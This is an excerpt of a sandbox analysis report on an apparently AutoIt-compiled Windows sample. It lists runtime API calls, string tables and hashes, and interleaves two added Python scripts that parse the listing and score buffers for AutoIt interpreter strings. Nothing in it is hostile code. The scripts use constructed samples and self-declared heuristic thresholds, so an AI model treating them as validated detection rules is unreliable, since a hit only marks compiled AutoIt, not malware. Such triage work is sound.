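The API listings above are the sandbox's reconstruction of the AutoIt v3 runtime's own GUI helpers (the hidden "AutoIt v3" window, the splash-text and progress windows, the ControlCommand() verb table). The following Python script is an added example, not part of the Joe Sandbox report, that parses this listing format, decodes the raw SendMessageW message numbers using constants from WinUser.h and CommCtrl.h, and reports AutoIt runtime indicators. The sample input is copied from the entries above; the rule that a three-argument SendMessageW is (Msg, wParam, lParam) because the sandbox dropped the hWnd is a heuristic assumed here, and the evidence thresholds are the author's choice.

```python
"""Parse Joe Sandbox 'APIs' / 'String ID' entries and fingerprint AutoIt runtime code."""
import re

# One "APIs" bullet as rendered in the execution graph, e.g.
#   • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,...), ref: 00327633
#   • Part of subcall function 0033A8CA: SendMessageW.USER32(...), ref: 0033A9ED
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+([0-9A-F]{8}):\s*)?"
    r"([A-Za-z0-9_]+)\.([A-Z0-9_]+)\((.*)\),\s*ref:\s*([0-9A-F]{8})\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(.*)$")

# Window messages present in the listing, decoded from WinUser.h / CommCtrl.h.
MESSAGES = {
    0x000E: "WM_GETTEXTLENGTH",
    0x0030: "WM_SETFONT",
    0x0172: "STM_SETIMAGE",
    0x0401: "PBM_SETRANGE",
    0x0404: "PBM_SETSTEP",
    0x1008: "LVM_DELETEITEM",
    0x1308: "TCM_DELETEITEM",
}

# Verbs accepted by AutoIt's ControlCommand(); one function's String ID above
# is exactly this set.
AUTOIT_CONTROLCOMMAND = {
    "ADDSTRING", "CHECK", "CURRENTTAB", "DELSTRING", "EDITPASTE", "FINDSTRING",
    "GETCURRENTCOL", "GETCURRENTLINE", "GETCURRENTSELECTION", "GETLINE",
    "GETLINECOUNT", "GETSELECTED", "HIDEDROPDOWN", "ISCHECKED", "ISENABLED",
    "ISVISIBLE", "SELECTSTRING", "SENDCOMMANDID", "SETCURRENTSELECTION",
    "SHOWDROPDOWN", "TABLEFT", "TABRIGHT", "UNCHECK",
}

# Constructed sample: entries copied from the report listing above.
SAMPLE = """
• DestroyWindow.USER32(00000000), ref: 003274DE
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00327633
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00327683
• SendMessageW.USER32(00000030,00000000,00000001), ref: 0032770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00327746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0032775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 0032776B
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00327B6B
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00327D7A
  • Part of subcall function 0033A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0033A9ED
• String ID: $AutoIt v3$DISPLAY$msctls_progress32$static
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
"""


def parse_listing(text):
    """Return (calls, strings): API call dicts and the set of String ID entries."""
    calls, strings = [], set()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            subcall, name, module, args, ref = m.groups()
            calls.append({
                "name": name, "module": module,
                "args": [a.strip() for a in args.split(",")] if args else [],
                "ref": int(ref, 16),
                "subcall": int(subcall, 16) if subcall else None,
            })
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            strings.update(s for s in m.group(1).split("$") if s)
    return calls, strings


def _hex(arg):
    """Hex argument -> int, or None for '?' and symbolic values."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_messages(calls):
    """Map each SendMessageW ref to a message name (None if not in MESSAGES).

    Heuristic (assumed): the sandbox rebuilds arguments from the stack and
    sometimes omits hWnd, so a 3-argument SendMessageW is read as
    (Msg, wParam, lParam); otherwise Msg is the second argument.
    """
    out = {}
    for c in calls:
        if c["name"] != "SendMessageW":
            continue
        args = c["args"]
        idx = 0 if len(args) == 3 else 1
        msg = _hex(args[idx]) if len(args) > idx else None
        out[c["ref"]] = MESSAGES.get(msg) if msg is not None else None
    return out


def autoit_evidence(calls, strings, min_verbs=8):
    """Collect indicators that a function belongs to the AutoIt v3 runtime."""
    evidence = []
    for c in calls:
        # CreateWindowExW(dwExStyle, lpClassName, ...): AutoIt's hidden main
        # window is created with the window class name "AutoIt v3".
        if c["name"] == "CreateWindowExW" and len(c["args"]) > 1 \
                and c["args"][1] == "AutoIt v3":
            evidence.append(f"window class 'AutoIt v3' created at {c['ref']:08X}")
    verbs = strings & AUTOIT_CONTROLCOMMAND
    if len(verbs) >= min_verbs:
        evidence.append(f"{len(verbs)} ControlCommand() verbs in string table")
    return evidence


if __name__ == "__main__":
    calls, strings = parse_listing(SAMPLE)
    for ref, name in decode_messages(calls).items():
        print(f"{ref:08X}: SendMessageW -> {name or 'unknown'}")
    for e in autoit_evidence(calls, strings):
        print("evidence:", e)
```

Run against a whole saved report, the parser yields one call list per function block; the "ref" addresses can then be matched to the "Part of subcall function" entries to rebuild the call tree, which is how the splash-image routine (file read, CreateStreamOnHGlobal, OleLoadPicture, STM_SETIMAGE) can be tied to the window-creation routine above without reading the raw disassembly.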
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0031AD1E
                                                                                                                    • GetDriveTypeW.KERNEL32(?,0033FAC0,?,\\.\,0033F910), ref: 0031ADFB
                                                                                                                    • SetErrorMode.KERNEL32(00000000,0033FAC0,?,\\.\,0033F910), ref: 0031AF59
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    • Opcode ID: 77ece4d477ccbe5b5605c02a716f9b335c0cc3f5ed080c2518dc60dc702cf760
                                                                                                                    • Instruction ID: 9902a431d96a7af0046d5ccc70534120b7db441fc0d067162adbb2c5175ae01e
                                                                                                                    • Opcode Fuzzy Hash: 77ece4d477ccbe5b5605c02a716f9b335c0cc3f5ed080c2518dc60dc702cf760
                                                                                                                    • Instruction Fuzzy Hash: 4251B4B064AA059B8B1BEB50CD92CFD7364EF4C702B208157E807A76D4CA30DD96DB52
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 1038674560-86951937
                                                                                                                    • Opcode ID: 735d39bcf60549001f978fea2546abf85f6c2930b51d6cb60df744c11c66e1fe
                                                                                                                    • Instruction ID: 87e24167dbfe78e1703c5fd8f42db45d0bab70a28854911c0ad2f9107257e725
                                                                                                                    • Opcode Fuzzy Hash: 735d39bcf60549001f978fea2546abf85f6c2930b51d6cb60df744c11c66e1fe
                                                                                                                    • Instruction Fuzzy Hash: A2815CB06606066ADF21AF61DC57FFF7768AF04780F444025F805AA1D2EBB4DD35CAA1
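The directive and error strings attached to this __wcsnicmp routine ("#include", "#include-once", "#requireadmin", "#OnAutoItStartRegister", "Bad directive syntax error", ...) are the AutoIt runtime's own preprocessor table, which is what backs the report's "Binary is likely a compiled AutoIt script file" verdict. The following Python is an added triage example, not part of the Joe Sandbox report: it scans a byte buffer (a file or a memory dump such as the .sdmp regions listed above) for those strings encoded as UTF-16LE, the form a wide-string comparison like __wcsnicmp operates on, and scores the hits. The sample buffers, the weighting and the threshold are constructed for illustration.

```python
"""Triage check for an embedded AutoIt interpreter.

Added example, not code from the Joe Sandbox report. The needle strings
are copied from the report's String ID list for the __wcsnicmp routine;
the scoring and the sample buffers below are assumptions made here.
"""

# Preprocessor directives recognised by the AutoIt runtime (from the report).
AUTOIT_DIRECTIVES = [
    "#OnAutoItStartRegister", "#ce", "#comments-end", "#comments-start",
    "#cs", "#include", "#include-once", "#notrayicon", "#pragma compile",
    "#requireadmin",
]

# Parser error messages from the same routine; rarer than the directives,
# so they are weighted higher below (weighting is an assumption).
AUTOIT_ERRORS = [
    "Bad directive syntax error",
    "Cannot parse #include",
    "Unterminated group of comments",
]


def find_autoit_directives(data: bytes) -> dict:
    """Return {string: occurrence count} for every needle found in `data`.

    Needles are searched as UTF-16LE because the routine compares wide
    strings; an ASCII scan would miss them entirely.
    """
    hits = {}
    for s in AUTOIT_DIRECTIVES + AUTOIT_ERRORS:
        count = data.count(s.encode("utf-16-le"))
        if count:
            hits[s] = count
    return hits


def autoit_score(data: bytes) -> int:
    """One point per distinct directive, three per distinct error message."""
    return sum(3 if s in AUTOIT_ERRORS else 1 for s in find_autoit_directives(data))


def looks_like_autoit(data: bytes, threshold: int = 6) -> bool:
    """Heuristic verdict; the threshold is a constructed default, tune per corpus."""
    return autoit_score(data) >= threshold


def scan_file(path: str) -> dict:
    """Scan a file or memory dump on disk and report hits, score and verdict."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {
        "hits": find_autoit_directives(data),
        "score": autoit_score(data),
        "autoit": looks_like_autoit(data),
    }


# Constructed sample buffers (not taken from the analysed binary).
SAMPLE_AUTOIT = (
    b"\x00" * 16
    + "#include-once".encode("utf-16-le") + b"\x00\x00"
    + "#requireadmin".encode("utf-16-le") + b"\x00\x00"
    + "Unterminated group of comments".encode("utf-16-le") + b"\x00\x00"
    + "Cannot parse #include".encode("utf-16-le") + b"\x00\x00"
)
SAMPLE_BENIGN = b"MZ\x90\x00" + b"This program cannot be run in DOS mode" + b"\x00" * 32

if __name__ == "__main__":
    for name, buf in (("autoit", SAMPLE_AUTOIT), ("benign", SAMPLE_BENIGN)):
        print(name, autoit_score(buf), looks_like_autoit(buf), find_autoit_directives(buf))
```

Two caveats a practitioner should keep in mind. First, these strings identify the AutoIt interpreter, which is present in every compiled AutoIt program, benign or not; a hit says "compiled AutoIt", as the report itself phrases it, not "malware". Second, a crypter can keep the interpreter encrypted on disk, so run the scan over the process memory dump (the .sdmp sources cited in this report) as well as the file, and note that "#include" also matches inside "#include-once" and "Cannot parse #include", which is why the score counts distinct strings rather than raw occurrences.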
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00339AD2
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00339B8B
                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00339BA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                    • Opcode ID: fbba4fa58a0cdc96e5c59c894e4357c5e5abfc969485a8f7d45ea8d82a83e26d
                                                                                                                    • Instruction ID: 460fb7ac69d2180f9ccbc2ab67a877d8ce7a468634969104ca6a2f7514e44d38
                                                                                                                    • Opcode Fuzzy Hash: fbba4fa58a0cdc96e5c59c894e4357c5e5abfc969485a8f7d45ea8d82a83e26d
                                                                                                                    • Instruction Fuzzy Hash: DF02AF30508301EFD726CF14C8C9BAABBE9FF49315F04452EF999962A1C7B5D944CB52
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 0033A903
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0033A907
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0033A91D
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0033A928
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 0033A92D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 0033A945
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0033A953
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0033A964
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0033A96D
                                                                                                                    • SelectObject.GDI32(?,?), ref: 0033A97A
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0033A999
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0033A9B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0033A9C5
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0033A9ED
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0033AA14
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0033AA32
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 0033AA3D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 0033AA4B
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0033AA53
                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0033AA67
                                                                                                                    • SelectObject.GDI32(?,0033A5FA), ref: 0033AA7E
                                                                                                                    • DeleteObject.GDI32(?), ref: 0033AA89
                                                                                                                    • SelectObject.GDI32(?,?), ref: 0033AA8F
                                                                                                                    • DeleteObject.GDI32(?), ref: 0033AA94
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0033AA9A
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0033AAA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: 168dfe3ba2355641dd055f8a31cac4f91844e2c5efeb0710587e064178f64fef
                                                                                                                    • Instruction ID: 4aa0d132de92e6f1e833e45c85cb46cfe43b5f545541eb7f5ecaadf3ed48a6b8
                                                                                                                    • Opcode Fuzzy Hash: 168dfe3ba2355641dd055f8a31cac4f91844e2c5efeb0710587e064178f64fef
                                                                                                                    • Instruction Fuzzy Hash: 6E512B71D00608FFDB129FA4DC89EAEBBB9EF08320F514625F911AB2A1D7759940DF90
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00338AC1
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00338AD2
                                                                                                                    • CharNextW.USER32(0000014E), ref: 00338B01
                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00338B42
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00338B58
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00338B69
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00338B86
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00338BD8
                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00338BEE
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00338C1F
                                                                                                                    • _memset.LIBCMT ref: 00338C44
                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00338C8D
                                                                                                                    • _memset.LIBCMT ref: 00338CEC
                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00338D16
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00338D6E
                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00338E1B
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00338E3D
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00338E87
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00338EB4
                                                                                                                    • DrawMenuBar.USER32(?), ref: 00338EC3
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00338EEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                    • Opcode ID: d12688cba5ab9da98c2255e60cf4005f4e2710cc49710534fdad22fea53e9430
                                                                                                                    • Instruction ID: deeb95afc373147495917652ac4e324099f36525f9fa6b4201535ce7d87964c2
                                                                                                                    • Opcode Fuzzy Hash: d12688cba5ab9da98c2255e60cf4005f4e2710cc49710534fdad22fea53e9430
                                                                                                                    • Instruction Fuzzy Hash: ADE15EB1900309AFDF229F64CCC5EEEBBB9EF05710F118156F915AA290DB748A85DF60
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 003349CA
                                                                                                                    • GetDesktopWindow.USER32 ref: 003349DF
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003349E6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00334A48
                                                                                                                    • DestroyWindow.USER32(?), ref: 00334A74
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00334A9D
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00334ABB
                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00334AE1
                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00334AF6
                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00334B09
                                                                                                                    • IsWindowVisible.USER32(?), ref: 00334B29
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00334B44
                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00334B58
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00334B70
                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00334B96
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00334BB0
                                                                                                                    • CopyRect.USER32(?,?), ref: 00334BC7
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00334C32
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 47ba2fd088c6bbd3f394760a73d11f25636e3d4691307463980c153159af25a6
• Instruction ID: b5a98523a172e8b490fdedf613bdf3ed11803d7609422a444728e52255f4d7fb
• Opcode Fuzzy Hash: 47ba2fd088c6bbd3f394760a73d11f25636e3d4691307463980c153159af25a6
• Instruction Fuzzy Hash: 75B19A70608340AFDB05DF64C885B6ABBE8FF88344F008A1DF9999B2A1D771EC45CB95
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 003144AC
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003144D2
• _wcscpy.LIBCMT ref: 00314500
• _wcscmp.LIBCMT ref: 0031450B
• _wcscat.LIBCMT ref: 00314521
• _wcsstr.LIBCMT ref: 0031452C
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00314548
• _wcscat.LIBCMT ref: 00314591
• _wcscat.LIBCMT ref: 00314598
• _wcsncpy.LIBCMT ref: 003145C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
• Opcode ID: 0b42d6e81ac6988e0eebafa28401cae10013a6200c50c1b9c81a8d335ae45808
• Instruction ID: d638eb767a438a33e86cb9bdea47580599bd34e2cdf5a6f5e3db1e7eda9ea107
• Opcode Fuzzy Hash: 0b42d6e81ac6988e0eebafa28401cae10013a6200c50c1b9c81a8d335ae45808
• Instruction Fuzzy Hash: CA41F531A10200BBDB16EB74CC47EFF776CDF4A710F40456BF904E6292EA359E219AA5
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002B28BC
• GetSystemMetrics.USER32(00000007), ref: 002B28C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002B28EF
• GetSystemMetrics.USER32(00000008), ref: 002B28F7
• GetSystemMetrics.USER32(00000004), ref: 002B291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002B2939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002B2949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002B297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002B2990
• GetClientRect.USER32(00000000,000000FF), ref: 002B29AE
• GetStockObject.GDI32(00000011), ref: 002B29CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 002B29D5
  • Part of subcall function 002B2344: GetCursorPos.USER32(?), ref: 002B2357
  • Part of subcall function 002B2344: ScreenToClient.USER32(003757B0,?), ref: 002B2374
  • Part of subcall function 002B2344: GetAsyncKeyState.USER32(00000001), ref: 002B2399
  • Part of subcall function 002B2344: GetAsyncKeyState.USER32(00000002), ref: 002B23A7
• SetTimer.USER32(00000000,00000000,00000028,002B1256), ref: 002B29FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 9339203f496a43f58e908da1a216ae91f5e3f5ca0db8bc94535e2fb71c23f5a5
• Instruction ID: f60d1caf5bada9250eddb81529b4a19e4052b73a6e9dc85c4df4a120e0d3cfb7
• Opcode Fuzzy Hash: 9339203f496a43f58e908da1a216ae91f5e3f5ca0db8bc94535e2fb71c23f5a5
• Instruction Fuzzy Hash: 4CB18F71A1020AEFDB15DFA8CC85BED7BB8FB08351F504129FA19A72A0DB749861CF50
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0030A47A
• __swprintf.LIBCMT ref: 0030A51B
• _wcscmp.LIBCMT ref: 0030A52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0030A583
• _wcscmp.LIBCMT ref: 0030A5BF
• GetClassNameW.USER32(?,?,00000400), ref: 0030A5F6
• GetDlgCtrlID.USER32(?), ref: 0030A648
• GetWindowRect.USER32(?,?), ref: 0030A67E
• GetParent.USER32(?), ref: 0030A69C
